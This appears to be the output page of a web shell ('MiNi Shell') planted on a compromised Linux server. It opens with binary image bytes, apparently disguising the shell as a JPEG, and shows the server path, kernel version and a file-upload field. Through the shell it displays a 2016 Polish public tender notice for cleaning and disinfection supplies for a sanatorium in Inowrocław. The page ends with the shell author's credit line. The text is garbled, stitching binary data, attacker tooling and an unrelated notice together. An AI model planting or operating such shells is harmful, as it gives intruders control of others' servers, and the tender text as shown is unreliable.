JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/56385-N-2016.html

<p class="kh_header"><b>Inowrocław: Sukcesywna dostawa środków czystości do Sanatorium Uzdrowiskowego Przy Tężni w Inowrocławiu s.p.z.o.z.</b><br>
<b>Numer ogłoszenia: 56385 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sanatorium Uzdrowiskowe  "Przy Tężni" im. dr Józefa Krzymińskiego w Inowrocławiu s.p.z.o.z , ul. Przy Stawku 12, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 358 13 00, faks 52 358 13 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przytezni.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa środków czystości do Sanatorium Uzdrowiskowego Przy Tężni w Inowrocławiu s.p.z.o.z..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje Sukcesywną dostawę środków czystości do Sanatorium Uzdrowiskowego Przy Tężni w Inowrocławiu s.p.z.o.z.
w zakresie określonym w niniejszej SIWZ wraz z załącznikami.
2.Przedmiot zamówienia został podzielony na 3 pakiety: 
	Pakiet nr 1 Środki myjąco - dezynfekcyjne (załącznik nr 4 do SIWZ)
	Pakiet nr 2 Środki do dezynfekcji (załącznik nr 5 do SIWZ)
	Pakiet nr 3 Środki chemiczne do utrzymania czystości (załącznik nr 6 do SIWZ)
3.Szczegółowy wykaz przedmiotu zamówienia wraz z wymaganymi ilościami stanowi załączniki od 4  do 6
UWAGA 
Podane w wykazie asortymentowo cenowym przedmiotu zamówienia nazwy produktów odwołujące się do określeń firmowych wskazujących na ich producenta i pochodzenie nie mają na celu naruszenia zasad uczciwej konkurencji określonych w art.  29 w związku z art. 7 ustawy PZP. 
		Zamawiający dopuszcza składanie ofert równoważnych, tzn. artykułów o innych nazwach handlowych niż określone przez Zamawiającego pod warunkiem, że będą posiadały parametry wyrażone w liczbach, gramaturę, pojemność, skład, zapach nie gorsze niż artykuły określone w załącznikach. 
	Na Wykonawcy ciąży udowodnienie, że równoważny artykuł nie jest gorszy od określonego przez Zamawiającego. W przypadku zaoferowania asortymentu równoważnego wykonawca winien wskazać w ofercie nazwę oraz dołączyć wymagane dokumenty.

4.Wymagania odnośnie przedmiotu zamówienia:

Każde dostarczane opakowanie przedmiotu zamówienia powinno zawierać etykietę zawierającą następujące dane:
4.1.	nazwę produktu,
4.2.	termin ważności,
4.3.	masę netto,
4.4.	warunki przechowywania,
4.5.	nazwę i adres producenta.
Zamawiający wymaga, aby termin ważności przedmiotu zamówienia wynosił min. 12 miesięcy od daty dostarczenia przedmiotu zamówienia do Zamawiającego. 

5.Warunki dodatkowe:
a.	Dostawy sukcesywne w miarę potrzeb zamawiającego, na zamówienia telefoniczne z wyprzedzeniem 2 dni,
b.	Dostawy do magazynu zamawiającego w godz.7.00- 13.00, środkiem transportu Wykonawcy i na jego koszt.
c.	 Oświadczenie, że oferowany asortyment posiada świadectwa dopuszczenia do obrotu na terenie RP, które Wykonawca zobowiązuje się dostarczyć Zamawiającemu na każde jego wezwanie.
Dostarczenie wraz z pierwszą dostawą kart charakterystyki dla każdego asortymentu produktów - dotyczy wszystkich pakietów.
d.	Pakiet nr 1 Środki myjąco - dezynfekcyjne:
Do oferty należy dołączyć karty charakterystyk (dot. poz. 1-18 - oprócz poz.13) i ulotki produktowe oferowanych środków dot. poz. 1-18,
e.	Dotyczy wszystkich pakietów - do oferty należy dołączyć karty charakterystyk i ulotki produktowe, zgodnie z wytycznymi w załączniku 4,5 i 6 do SIWZ,
f.	Pakiet nr 1 Środki myjąco - dezynfekcyjne:
Do oferty należy dołączyć pozwolenie ministra właściwego do spraw zdrowia na wprowadzenie do obrotu produktu biobójczego - zgodnie z przepisami ustawy z dnia  13 września 2002 r. o produktach biobójczych (Dz. U. Nr 175, poz. 1433 z późn. zm.) - dot. poz. 6, 9, 12, 
g.	Dotyczy wszystkich pakietów - Zamawiający zastrzega sobie prawo do przeprowadzenia badań laboratoryjnych oferowanych środków na zgodność ze specyfikacją na koszt dostawcy, dwukrotnie w ciągu trwania umowy,
h.	Pakiet nr 1 Środki myjąco - dezynfekcyjne:
Dla produktu określonego w poz. 6 oferty cenowej Dostawca nieodpłatnie dostarczy i zamontuje jedno urządzenie dozujące do przygotowywania roztworów roboczych z koszami ze stali nierdzewnej do zamontowania kanistrów na ścianie oraz min. 20 m węża, który powinien być zakończony pistoletem dozującym roztwór lub czystą wodę na powierzchnie.
Dla produktu określonego w poz. 3 oferty cenowej Dostawca nieodpłatnie dostarczy i zamontuje urządzenia dozujące chemię w ilości według wskazań Zamawiającego.
                  i.  Pakiet nr 3 Środki chemiczne do utrzymania czystości:
Wykonawca dla produktu w poz. 11,16 i 23 nieodpłatnie zamontuje centralny system dozowania.        	   
      j.	Pakiet nr 1 Środki myjąco - dezynfekcyjne:
Oferowane produkty z poz. 1 do 11 nie mogą zawierać NTA oraz muszą być przeznaczone do obiektów zbiorowego żywienia, ponadto produkty poz. 1-9  muszą pochodzić od jednego producenta z jednej linii produktowej, każda dostawa osobno. 
k.	Dotyczy wszystkich pakietów - dostawca zobowiązuje się do przeprowadzenia szkoleń dla personelu każdorazowo na życzenie zamawiającego, potwierdzonych kartą szkolenia,
l.	Pakiet nr 1 Środki myjąco - dezynfekcyjne:
Dostawca przynajmniej raz na kwartał przeprowadzi bezpłatny przegląd okresowy urządzeń dozujących dostarczonych i zamontowanych przez niego nieodpłatnie, potwierdzony kartą serwisową.
m.	Pakiet nr 1 Środki myjąco - dezynfekcyjne:
Dostawca dla produktu z poz. 1 i 2 zamontuje dozowniki płynu myjącego i nabłyszczającego do 2 zmywarek kapturkowych, które posiada zamawiający.
n.	Dotyczy wszystkich pakietów - Wykonawca zobowiązuje się dostarczyć nieodpłatnie wszystkie niezbędne instrukcje stanowiskowe i higieniczne do zaproponowanych środków,
o.	Pakiet nr 3 Środki chemiczne do utrzymania czystości:
Dostarczane produkty dla pozycji 11, 16 i 23 muszą pochodzić od jednego producenta z jednej linii produktowej, każda dostawa osobno.
p.	Pakiet nr 2 Środki do dezynfekcji - do oferty należy dołączyć pozwolenie ministra właściwego do spraw zdrowia na wprowadzenie do obrotu produktu biobójczego, atesty PZH, deklaracje zgodności, zgłoszenie do CPNP, zgodnie z wytycznymi w załączniku nr 5 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8, 39.83.00.00-9, 39.83.12.20-4, 39.80.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający odstępuje od opisu warunku w tym zakresie. 
2.Zamawiający uzna, iż Oferent spełnia wwym. warunek na podstawie złożonego oświadczenia -załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający odstępuje od opisu warunku w tym zakresie. 
2.Zamawiający uzna, iż Oferent spełnia wwym. warunek na podstawie złożonego oświadczenia -załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający odstępuje od opisu warunku w tym zakresie. 
2.Zamawiający uzna, iż Oferent spełnia wwym. warunek na podstawie złożonego oświadczenia -załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający odstępuje od opisu warunku w tym zakresie. 
2.Zamawiający uzna, iż Oferent spełnia wwym. warunek na podstawie złożonego oświadczenia -załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający odstępuje od opisu warunku w tym zakresie. 
2.Zamawiający uzna, iż Oferent spełnia wwym. warunek na podstawie złożonego oświadczenia -załącznik nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie, że oferowany asortyment posiada świadectwa dopuszczenia do obrotu na terenie RP, które Dostawca zobowiązuje się dostarczyć Zamawiającemu na każde jego wezwanie. Dostarczenie wraz z pierwszą dostawą kart charakterystyki dla każdego asortymentu.
2 Pozwolenie ministra właściwego do spraw zdrowia na wprowadzenie do obrotu produktu biobójczego - zgodnie z przepisami ustawy z dnia  13 września 2002 r. o produktach biobójczych (Dz. U. Nr 175, poz. 1433 z późn. zm.) - zgodnie z wytycznymi w załącznikach 4,5 i 6 do SIWZ,
3. Karty Charakterystyki substancji niebezpiecznej zgodnej z aktualnie obowiązującymi przepisami - zgodnie z wytycznymi w załącznikach 4,5 i 6 do SIWZ,
4.Atesty PZH, deklaracje zgodności, zgłoszenie do CPNP, ulotki produktowe  - zgodnie z wytycznymi w załącznikach 4,5 i 6 do SIWZ


Inne załączniki do SIWZ
1.Formularz ofertowy załącznik nr 1 do SIWZ,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2.Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Prawo zamówień publicznych załącznik nr 2 do SIWZ,
3.Oświadczenie o braku podstaw do wykluczenia z postepowania o udzielenie zamówienia z art. 24  ust. 1 Ustawy Prawo zamówień publicznych załącznik nr 3 do SIWZ,
4.Oferta cenowa na poszczególne pakiety załącznik nr 4,5 i 6 do SIWZ ,
5.Wzór umowy załącznik nr 7 do SIWZ,
6.Oświadczenie dotyczące grupy kapitałowej załącznik nr 8 do SIWZ 
7.Oświadczenie dotyczące tajemnicy przedsiębiorstwa załącznik nr 9 do SIWZ,
8.Podwykonawcy Załącznik nr 10 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przytezni.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Spraw Pracowniczych i Przygotowania Umów z siedzibą w Inowrocławiu przy ul. Przy Stawku 12 88 - 100 Inowrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 08:00, miejsce: Dział Spraw Pracowniczych i Przygotowania Umów z siedzibą w Inowrocławiu przy ul. Przy Stawku 12 88 - 100 Inowrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 Środki myjąco - dezynfekcyjne (załącznik nr 4 do SIWZ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje dostawę Środków myjąco - dezynfekcyjnych dla potrzeb zamawiającego w zakresie określonym w SIWZ wraz z załącznikami. 2. Szczegółowy wykaz przedmiotu zamówienia wraz z wymaganymi ilościami stanowi załącznik nr 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Środki do dezynfekcji (załącznik nr 5 do SIWZ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje dostawę Środków do dezynfekcji dla potrzeb zamawiającego w zakresie określonym w SIWZ wraz z załącznikami. 2. Szczegółowy wykaz przedmiotu zamówienia wraz z wymaganymi ilościami stanowi załącznik nr 5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Środki chemiczne do utrzymania czystości (załącznik nr 6 do SIWZ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje dostawę Środków chemicznych do utrzymania czystości dla potrzeb zamawiającego w zakresie określonym w SIWZ wraz z załącznikami. 2. Szczegółowy wykaz przedmiotu zamówienia wraz z wymaganymi ilościami stanowi załącznik nr 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.83.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com